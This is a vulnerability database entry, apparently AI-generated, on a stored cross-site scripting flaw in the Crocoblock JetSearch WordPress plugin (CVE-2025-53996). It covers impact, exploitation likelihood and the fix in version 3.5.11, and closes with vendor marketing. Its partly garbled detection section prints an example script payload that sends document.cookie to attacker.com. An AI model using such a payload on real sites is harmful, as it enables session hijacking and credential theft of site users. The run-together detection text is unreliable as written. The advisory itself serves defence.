
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-53996 is a Stored Cross-Site Scripting (XSS) vulnerability in the Crocoblock JetSearch WordPress plugin, classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). It affects all versions of JetSearch up to and including 3.5.10.1, with version 3.5.11 containing the fix. The vulnerability was reported on July 4, 2025, by researcher "stealthcopter" and publicly disclosed on July 16, 2025, by Patchstack. It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack).
The vulnerability is rooted in insufficient input sanitization and output escaping within the JetSearch plugin, allowing authenticated users with Contributor-level privileges or higher to inject and persistently store malicious JavaScript or HTML payloads (CWE-79). Because the injected content is stored server-side and rendered to site visitors, it qualifies as Stored XSS rather than reflected. Exploitation requires the attacker to have at minimum Contributor access to the WordPress site, and successful impact on victims requires a privileged user to view the affected content. No public proof-of-concept exploit code has been identified at this time (Patchstack).
Successful exploitation allows an attacker to inject persistent malicious scripts into WordPress pages, which execute in the browsers of site visitors and administrators. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims, defacement, or redirection to malicious sites. The scope extends beyond the attacker's own session, as stored payloads affect all users who view the compromised content (Patchstack).
No active in-the-wild exploitation has been reported, and no public proof-of-concept exploit code is known to exist. The EPSS score is approximately 0.031% (0.000310), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress sites at scale, regardless of site popularity (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in an unsanitized parameter.wp_posts or related plugin tables containing unexpected <script> tags, event handlers (e.g., onerror, onload), or encoded JavaScript payloads in JetSearch-related fields.wp-content/plugins/jet-search/ that may indicate post-exploitation tampering.The vendor Crocoblock has released JetSearch version 3.5.11, which patches this vulnerability. All site administrators running JetSearch 3.5.10.1 or earlier should update to version 3.5.11 or later immediately. As a temporary measure, restricting Contributor-level user registration or tightening role permissions can reduce the attack surface. Patchstack users can enable auto-update for vulnerable plugins to receive protection automatically (Patchstack).
Wordfence included this vulnerability in its weekly WordPress vulnerability report for the period of July 14–20, 2025, providing broader community visibility (Wordfence). Red Packet Security also referenced it in a CISA vulnerability summary for the week of July 14, 2025. No significant vendor statements or notable researcher commentary beyond the Patchstack disclosure have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."